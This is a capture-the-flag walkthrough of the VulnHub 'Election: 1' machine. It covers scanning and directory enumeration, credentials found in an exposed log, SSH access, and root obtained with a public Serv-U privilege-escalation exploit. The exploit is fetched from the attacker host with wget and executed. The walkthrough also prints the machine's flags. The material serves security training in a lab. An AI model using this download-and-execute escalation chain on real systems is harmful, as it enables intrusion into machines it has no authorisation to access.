ELECTION: 1 VulnHub CTF walkthrough
Information shared in this article is intended for educational purposes only. Infosec and the author are not responsible for nefarious actions associated with the information shared in this article.
In this article, we will solve a Capture the Flag (CTF) challenge that was posted on the VulnHub website by an author named “Love.” As per the description given by the author, “It is an OSCP-like VM and the difficulty level is medium.” And the end goal is to get the root and read the flag file.
You can check out my previous articles for more CTF challenges. We have also provided a downloadable URL for this CTF:
You can download the machine and run it on VirtualBox. The torrent downloadable URL is also available for this VM and has been added in the reference section of this article.
For those who are not aware of the site, VulnHub is a well-known website for security researchers that aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable machines from this website and try to exploit them. There are a lot of other challenging CTF exercises available on vulnhub.com and I highly suggest attempting them, as it is a good way to sharpen your skills and learn new techniques in a safe environment.
Please note: For all of these machines, I have used Oracle Virtual Box to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.
The summary of the steps required in solving this CTF is given below:
- Get the target machine IP address by running the VM
- Get open port details by using the Nmap Tool
- Enumerate HTTP Service with Dirb
- Log in to SSH with Love User
- Get the root with Local Exploit and reading the flag file
The first step is to run the netdiscover command to identify the target machine’s IP address. In the screenshot given below, we can see the netdiscover command which gives us the list of all the available live host IP addresses in the network. [CLICK IMAGES TO ENLARGE]
Command used: << netdiscover >>
In the above screenshot, it can be seen that we have the IP address of all the devices connected to our router, but due to security reasons, we have hidden the MAC address of my personal connected devices. The Virtual Machine IP address that we will be working on throughout this challenge is 192.168.1.20 (the target machine IP address). We will be using 192.168.1.18 as the attacker IP address.
Note: The target machine IP address may be different in your case, as it is being assigned by the network DHCP.
After getting the target machine’s IP address, the next step is to find out the open ports and services available on the machine. We will use the Nmap tool, as it works effectively and is by default available on Kali Linux. The results can be seen below:
The Nmap output shows two ports on the target machine that have been identified as open. In the Nmap command, we used the “-sV” switch for version enumeration. We also used the “-p-” option for a full port scan. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. By default, Nmap conducts the scan only on known 1024 ports. So, it is especially important to conduct a full port scan during pentesting or while solving the CTF for maximum results.
In our case, however, we have found only two ports, in which the first one is being used for SSH and the second one is being used for HTTP. So, in the next step we will start with the HTTP port 80.
We opened the target machine’s IP address on the browser to see the web application. It can be seen in the following screenshot:
As we can see above, the Apache default page is showing on the target machine, which means we have to identify the hidden directories. This can be done through the dirb utility, which is available in Kali Linux.
Command Used: << dirb http://192.168.1.20 >>
As can be seen in the above screenshot, we ran the dirb utility on our target machine, which generated a large output in which some of the identified files come with 200 response code. We analyzed all the identified directories and files and got to know that our target machine is running phpMyAdmin, which can be seen in the following screenshot.
We tried some default database usernames and passwords to log into the phpMyAdmin, but none of them work here. So, we opened robots.txt file to see if it has any useful information. The output of the robots.txt can be seen in the following screenshot:
As can be seen in the above screenshot, it has some names so we assume that it would be the folder name. We tried to open each folder in the browser and found a running website from the election folder, which can be seen in the following screenshot.
We checked the website but did not get any interesting information. After spending some time on it, we again took the help of the dirb utility to identify the hidden files and directory. The output of the dirb can be seen in the following screenshot.
Command used: << dirb http://192.168.1.20/election/ >>
In the highlighted area of the above screenshot, we can see that some files haven’t been identified by the scanner. So, let’s open these files one by one which can be seen in the below screenshot.
We opened the admin folder, which shows a login page. We tried some random and default usernames and passwords, but none of them help us to log in. We also tried SQL Injection to bypass the login page but have not succeeded.
We checked the logs folder which was identified by the dirb and found that directory listing was enabled which can be seen in the following screenshot.
Finally, we got some interesting information, so we opened the system.log file, which shows a username and password. It can be seen in the following screenshot.
Until now we have completed the initial enumeration and got a username and password in the logs file. We also identified three different ways to log in. The first is SSH port, the second is phpMyAdmin and the third is the election admin login page. In the next step, we will use try to use these credentials for getting access.
As we know from the previous step, we have three different login methods in our target machine. It could be the password of the admin of the website, or it may be the password of the PhpMyAdmin. I tried this password in both logins, but it does not seem to be working. Then I tried this username and password for SSH login, which can be seen in the below screenshot.
Command used: << ssh firstname.lastname@example.org >>
- Username: love
- Password: P@$$w0rd@123
As we can be seen in the above screenshot, we can log into the machine with the identified username and password. While exploring the target machine with Love user, we got the user flag in the Love user desktop, which can be seen below:
Command used: << cat user.txt >>
We captured the first user flag. However, the target of this CTF was to take the root access and read the root flag file. In the next step we will do some more enumeration and try to get the root access.
In the previous step, we got the user access. Now let’s run a few commands to check the running operating system version and the kernel version. The command and their output can be seen below.
- << uname -a >>
- << cat /etc/issue >>
As can be seen in the above screenshot, first we used uname -a command, which gives the information about the running kernel version. Then we used cat /etc/issue command which tells about the running operating system and their version. After getting this information we checked online for any local exploits, but we did not get any working exploits.
We spend some more time on enumeration and find the Serv-U utility, which can be seen in the below screenshot:
Command Used: << find / -prem -u=s -type f 2>/dev/null >>
As can be seen in the above screenshot, we ran the find command, which shows the utilities that can be run in user context. While checking these utilities, we find out that Serv-U utility is having the vulnerability of local privilege escalation and the working exploit is available on an exploit db website, as seen below:
The first Google result shows the exploit db website URL. Let’s open the URL to view the exploit.
As can be seen in the above screenshot, the exploit is written in C language, which needs to be compiled before running it. However, we checked our target system and got to know that gcc compiler is not available in our target system. So, we downloaded the exploit by using the wget utility in the attacker system that we compiled by using the gcc compiler and transferred the exploit into our target system. All the commands can be seen in the following screenshot:
- < wget https://www.exploit-db.com/raw/47009 >>
- << mv 47009 47009.c >>
- << gcc 47009.c >>
As can be seen in the above screenshot, in our attacker system we first changed the working directory to /var/ww/html. Then we used wget utility to download the exploit. After that we renamed the exploit and compiled the with gcc compiler, which generated the a.out file.
After compiling the exploit, we started the HTTP service in our attacker machine by using the /etc/init.d/apache2 start command.
- << wget 192.168.1.17/bb/a.out >>
- << chmod +x a.out >>
- << ./a.out >>
Now in the target machine in which we had the user access, we again used wget utility to download the a.out file in the target system. After downloading it, we give the executable permission by using the chmod command. Then we run the exploit, which gives the root access. We verified it by using the ID command.
Now we have the root access, so let’s read the root flag file, which can be seen in the following screenshot.
Command used: << cat /root/root.txt >>
We captured the two flags and have the root access on our target machine, which completed this CTF. Both flags are given below.
- Root Flag: 5238feefc4ffe09645d97e9ee49bc3a6
- User Flag: cd38ac698c0d793a5236d01003f692b0
We've encountered a new and totally unexpected error.
Get instant boot camp pricing
A new tab for your requested boot camp pricing will open in 5 seconds. If it doesn't open, click here.